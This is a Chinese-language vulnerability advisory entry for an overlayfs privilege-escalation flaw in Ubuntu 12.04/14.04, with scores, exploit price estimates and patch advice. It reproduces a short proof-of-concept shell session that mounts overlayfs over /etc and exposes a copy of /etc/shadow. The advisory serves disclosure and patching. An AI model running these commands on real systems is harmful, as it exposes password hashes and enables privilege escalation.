Ubuntu Linux 12.04/14.04 overlayfs 权限提升

CVSS 元临时分数	当前攻击价格 (≈)	CTI兴趣分数
7.6	$0-$5k	0.00

摘要信息

在Ubuntu Linux 12.04/14.04 中曾发现分类为棘手的漏洞。受此问题影响的是某些未知功能的组件:overlayfs。当被操控时，会导致权限提升。此外，存在可用的漏洞利用。建议通过打补丁来解决此问题。

细节信息

在Ubuntu Linux 12.04/14.04 中曾发现分类为棘手的漏洞。受此问题影响的是某些未知功能的组件:overlayfs。当被操控时，会导致权限提升。漏洞的CWE定义是 CWE-269。此弱点已在 2015-06-16 以Mailinglist Post形式（oss-sec）公布。分享公告的网址是seclists.org。

没有可用的技术细节。该漏洞的普及率低于常规水平。此外，存在可用的漏洞利用。漏洞利用已被公开，可能会被利用。当前漏洞利用价值为美元大约是 $0-$5k。 MITRE ATT&CK项目声明攻击技术为T1068。

若有长度，则其被标记为概念验证。漏洞利用工具已在exploit-db.com共享下载。我们估计的零日攻击价值约为$25k-$100k。此漏洞利用的代码如下：

[email protected]:~$ ./create-namespace
[email protected]:~# mount -t overlay -o
lowerdir=/etc,upperdir=upper,workdir=work overlayfs o
[email protected]:~# chmod 777 work/work/
[email protected]:~# cd o
[email protected]:~/o# mv shadow copy_of_shadow
(exit the namespace)
[email protected]:~$ ls -al upper/copy_of_shadow
-rw-r----- 1 root shadow 1236 May 24 15:51 upper/copy_of_shadow
[email protected]:~$ stat upper/copy_of_shadow /etc/shadow|grep Inode
Device: 801h/2049d      Inode: 939791      Links: 1
Device: 801h/2049d      Inode: 277668      Links: 1

请访问git.launchpad.net下载修复补丁。建议通过打补丁来解决此问题。

该漏洞也被记录在其他漏洞数据库中：X-Force (103882)。